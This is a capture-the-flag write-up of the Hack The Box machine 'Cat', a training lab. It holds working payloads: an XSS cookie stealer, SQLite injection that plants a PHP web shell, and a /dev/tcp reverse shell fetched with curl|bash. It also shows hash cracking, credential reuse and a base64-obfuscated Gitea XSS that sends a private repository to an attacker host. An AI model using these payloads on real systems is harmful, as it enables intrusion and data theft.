> m4rt@CTF_ARCHIVE:~$

// ATTACHMENTS

Hack The Box / LINUX / 2025-02-08

Hack The Box — Cat (Linux)

Stored XSS steals admin session, SQLite injection writes web shell, credential reuse and log leakage pivot to axel, then Gitea XSS-driven repo theft reveals root credentials.

Target

  • IP: 10.129.231.253

Recon

sudo nmap -sC -sV 10.129.231.253 -p- -T5 -v

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 96:2d:f5:c6:f6:9f:59:60:e5:65:85:ab:49:e4:76:14 (RSA)
|   256 9e:c4:a4:40:e9:da:cc:62:d1:d6:5a:2f:9e:7b:d4:aa (ECDSA)
|_  256 6e:22:2a:6a:6d:eb:de:19:b7:16:97:c2:7e:89:29:d5 (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://cat.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Add cat.htb to /etc/hosts.

Go to http://cat.htb/.

It is a PHP site.

Go to Join.

Register with any user.

Click Already have an account.

Log in.

gobuster dir -u 'http://cat.htb/' -w /home/kali/SecLists/Discovery/Web-Content/raft-small-words.txt -t 50 -x php

We notice:

/.git                 (Status: 301) [Size: 301] [--> http://cat.htb/.git/]
/uploads              (Status: 301) [Size: 304] [--> http://cat.htb/uploads/]

Download git-dumper: https://github.com/arthaud/git-dumper

mkdir repo
python3 git-dumper/git_dumper.py http://cat.htb/ repo
cd repo

We now have website source code.

We discover it uses an SQLite database named /databases/cat.db.

There is an XSS in the username we register.

Start Python HTTP server listener:

python3 -m http.server 80

Register a user with this username:

<img src=x onerror=this.src='http://10.10.14.2/?c='+document.cookie;>

Register a cat with random details.

Wait.

In Python HTTP server terminal we get the admin session cookie, for example:

PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6

Set it in browser.

We become admin.

In accept_cat.php we notice:

if ($_SERVER["REQUEST_METHOD"] == "POST") {
        if (isset($_POST['catId']) && isset($_POST['catName'])) {
            $cat_name = $_POST['catName'];
            $catId = $_POST['catId'];
            $sql_insert = "INSERT INTO accepted_cats (name) VALUES ('$cat_name')";
            $pdo->exec($sql_insert);

            $stmt_delete = $pdo->prepare("DELETE FROM cats WHERE cat_id = :cat_id");
            $stmt_delete->bindParam(':cat_id', $catId, PDO::PARAM_INT);
            $stmt_delete->execute();

            echo "The cat has been accepted and added successfully.";

There is SQL injection.

Useful reference:

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md

curl -X POST 'http://cat.htb/accept_cat.php' --cookie 'PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6' -d "catName=a'); ATTACH DATABASE 'uploads/shell.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\"); -- &catId=1"

If it does not work, intercept with Burp:

curl -X POST 'http://cat.htb/accept_cat.php' --cookie 'PHPSESSID=t0ip0d2tts1rfnq2fdg32f8su6' -d "catName=a'); ATTACH DATABASE 'uploads/shell.php' AS lol; CREATE TABLE lol.pwn (dataz text); INSERT INTO lol.pwn (dataz) VALUES (\"<?php system($_GET['cmd']); ?>\"); -- &catId=1" --proxy 'http://127.0.0.1:8080/'

And URL-encode the payload.

Create a file rev with content:

bash -i >& /dev/tcp/10.10.14.2/4444 0>&1

Start listeners:

python3 -m http.server 80
nc -vlnp 4444

Go to:

http://cat.htb/uploads/shell.php?cmd=curl http://10.10.14.2/rev|bash

We get a reverse shell as www-data.

Download databases/cat.db to our machine.

sqlite3 cat.db
.tables

accepted_cats  cats           users

select * from users;

1|axel|axel2017@gmail.com|d1bbba3670feb9435c9841e46e60ee2f
2|rosa|rosamendoza485@gmail.com|ac369922d560f17d6eeb8b2c7dec498c
3|robert|robertcervantes2000@gmail.com|42846631708f69c00ec0c0a8aa4a92ad
4|fabian|fabiancarachure2323@gmail.com|39e153e825c4a3d314a0dc7f7475ddbe
5|jerryson|jerrysonC343@gmail.com|781593e060f8d065cd7281c5ec5b4b86
6|larry|larryP5656@gmail.com|1b6dce240bbfbc0905a664ad199e18f8
7|royer|royer.royer2323@gmail.com|c598f6b844a36fa7836fba0835f1f6
8|peter|peterCC456@gmail.com|e41ccefa439fc454f7eadbf1f139ed8a
9|angel|angel234g@gmail.com|24a8ec003ac2e1b3c5953a6f95f8f565
10|jobert|jobert2020@gmail.com|88e4dceccd48820cf77b5cf6c08698ad

Put this in file hash:

axel:d1bbba3670feb9435c9841e46e60ee2f
rosa:ac369922d560f17d6eeb8b2c7dec498c
robert:42846631708f69c00ec0c0a8aa4a92ad
fabian:39e153e825c4a3d314a0dc7f7475ddbe
jerryson:781593e060f8d065cd7281c5ec5b4b86
larry:1b6dce240bbfbc0905a664ad199e18f8
royer:c598f6b844a36fa7836fba0835f1f6
peter:e41ccefa439fc454f7eadbf1f139ed8a
angel:24a8ec003ac2e1b3c5953a6f95f8f565
jobert:88e4dceccd48820cf77b5cf6c08698ad

hashcat -a 0 -m 0 ./hash ./rockyou.txt --username
hashcat -a 0 -m 0 ./hash ./rockyou.txt --username --show
rosa:ac369922d560f17d6eeb8b2c7dec498c:soyunaprincesarosa

ssh rosa@cat.htb

Use found password.

We get a shell as rosa.

id

uid=1001(rosa) gid=1001(rosa) groups=1001(rosa),4(adm)

The Adm group is used in Linux for system monitoring tasks. Members of this group can read many log files in /var/log, and can use xconsole. This could be exploited as confidential information such as user passwords can sometimes end up in certain application or system logs.

cat apache2/access.log.1

We find:

127.0.0.1 - - [31/Jan/2025:12:30:03 +0000] "GET /join.php?loginUsername=axel&loginPassword=aNdZwgC4tI9gnVXv_e3Q&loginForm=Login HTTP/1.1" 302 329 "http://cat.htb/join.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0"

ssh axel@cat.htb

Use password aNdZwgC4tI9gnVXv_e3Q.

ls -la /home

total 24
drwxr-xr-x  6 root   root   4096 Aug 30 23:19 .
drwxr-xr-x 19 root   root   4096 Aug 31 18:28 ..
drwxr-x---  5 axel   axel   4096 Jan 21 12:52 axel
drwxr-x---  3 git    git    4096 Jan 21 12:49 git
drwxr-x---  6 jobert jobert 4096 Jan 21 12:49 jobert
drwxr-x---  5 rosa   rosa   4096 Jan 21 12:49 rosa

ss -ltpn

State        Recv-Q       Send-Q               Local Address:Port                Peer Address:Port       Process
LISTEN       0            37                       127.0.0.1:46161                    0.0.0.0:*
LISTEN       0            4096                 127.0.0.53%lo:53                       0.0.0.0:*
LISTEN       0            128                        0.0.0.0:22                       0.0.0.0:*
LISTEN       0            4096                     127.0.0.1:3000                     0.0.0.0:*
LISTEN       0            10                       127.0.0.1:25                       0.0.0.0:*
LISTEN       0            1                        127.0.0.1:34115                    0.0.0.0:*
LISTEN       0            128                      127.0.0.1:51401                    0.0.0.0:*
LISTEN       0            10                       127.0.0.1:587                      0.0.0.0:*
LISTEN       0            511                              *:80                             *:*
LISTEN       0            128                           [::]:22                          [::]:*

cat /var/spool/mail/axel

From rosa@cat.htb  Sat Sep 28 04:51:50 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S4pnXk001592
        for <axel@cat.htb>; Sat, 28 Sep 2024 04:51:50 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S4pnlT001591
        for axel@localhost; Sat, 28 Sep 2024 04:51:49 GMT
Date: Sat, 28 Sep 2024 04:51:49 GMT
From: rosa@cat.htb
Message-Id: <202409280451.48S4pnlT001591@cat.htb>
Subject: New cat services

Hi Axel,

We are planning to launch new cat-related web services, including a cat care website and other projects. Please send an email to jobert@localhost with information about your Gitea repository. Jobert will check if it is a promising service that we can develop.

Important note: Be sure to include a clear description of the idea so that I can understand it properly. I will review the whole repository.

From rosa@cat.htb  Sat Sep 28 05:05:28 2024
Return-Path: <rosa@cat.htb>
Received: from cat.htb (localhost [127.0.0.1])
        by cat.htb (8.15.2/8.15.2/Debian-18) with ESMTP id 48S55SRY002268
        for <axel@cat.htb>; Sat, 28 Sep 2024 05:05:28 GMT
Received: (from rosa@localhost)
        by cat.htb (8.15.2/8.15.2/Submit) id 48S55Sm0002267
        for axel@localhost; Sat, 28 Sep 2024 05:05:28 GMT
Date: Sat, 28 Sep 2024 05:05:28 GMT
From: rosa@cat.htb
Message-Id: <202409280505.48S55Sm0002267@cat.htb>
Subject: Employee management

We are currently developing an employee management system. Each sector administrator will be assigned a specific role, while each employee will be able to consult their assigned tasks. The project is still under development and is hosted in our private Gitea. You can visit the repository at: http://localhost:3000/administrator/Employee-management/. In addition, you can consult the README file, highlighting updates and other important details, at: http://localhost:3000/administrator/Employee-management/raw/branch/main/README.md.

ssh axel@cat.htb -NL 3000:localhost:3000 -NL 25:localhost:25

Enter password.

Go to http://127.0.0.1:3000/.

It is Gitea.

Log in with Axel's credentials.

Gitea version is 1.22.0.

There is an XSS vulnerability with exploit:

https://www.exploit-db.com/exploits/52077

Start a Python HTTP server listener:

python3 -m http.server 80

In Gitea create a new repository test.

Add a new file with random content.

Go to repository settings.

Set description to:

<a href=javascript:fetch("http://10.10.14.2/?c="+document.cookie)>XSS test</a>

Save settings.

Now we must send an email to jobert.

swaks --to jobert@cat.htb --from rosa@cat.htb --header "Subject: test" --body 'http://localhost:3000/axel/test' --server 127.0.0.1

Or:

telnet 127.0.0.1 25

Enter:

HELO localhost
MAIL FROM:<rosa@cat.htb>
RCPT TO:<jobert@cat.htb>
DATA
Subject: Test
http://localhost:3000/axel/test
.
QUIT

Wait.

We receive a request, but no cookie.

In browser F12 -> Application, we notice cookie i_like_gitea is HttpOnly, so we cannot steal it with JavaScript.

Change payload to steal the Employee-management repo mentioned in email.

New payload:

<a href=javascript:eval(atob('ZmV0Y2goJ2h0dHA6Ly9sb2NhbGhvc3Q6MzAwMC9hZG1pbmlzdHJhdG9yL0VtcGxveWVlLW1hbmFnZW1lbnQvYXJjaGl2ZS9tYWluLnppcCcse21ldGhvZDonR0VUJ30pDQoudGhlbigocmVzcG9uc2UpID0+IHsNCnJldHVybiByZXNwb25zZS5ieXRlcygpOw0KfSkNCi50aGVuKChkYXRhKSA9PiB7DQoJZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4yOjU1NTUvJyx7bWV0aG9kOidQT1NUJyxtb2RlOiduby1jb3JzJyxib2R5OmJ0b2EoZGF0YSl9KTsNCn0pDQouY2F0Y2goKGVycm9yKSA9PiB7DQoJZmV0Y2goJ2h0dHA6Ly8xMC4xMC4xNC4yOjU1NTUvJyx7bWV0aG9kOidQT1NUJyxtb2RlOiduby1jb3JzJyxib2R5OmVycm9yfSk7DQp9KTs='))>XSS test</a>

Base64-decoded JavaScript payload:

fetch('http://localhost:3000/administrator/Employee-management/archive/main.zip',{method:'GET'})
.then((response) => {
return response.bytes();
})
.then((data) => {
    fetch('http://10.10.14.2:5555/',{method:'POST',mode:'no-cors',body:btoa(data)});
})
.catch((error) => {
    fetch('http://10.10.14.2:5555/',{method:'POST',mode:'no-cors',body:error});
});

Start netcat listener:

nc -vlnp 5555 > roba_b64

Modify repo description (or recreate the repo if deleted) with the new payload.

Send the email.

We get a connection.

vim roba_b64

Remove unrelated text.

Go to CyberChef:

https://gchq.github.io/CyberChef/

Set roba_b64 as input.

Recipe: From Base64, then From Decimal.

Save output to a file.

We get a .zip file.

Extract it.

It is a website repository.

cat index.php

We notice:

$valid_username = 'admin';
$valid_password = 'IKw75eR0MR7CMIxhH0';

su root

Enter found password.

We get a shell as root.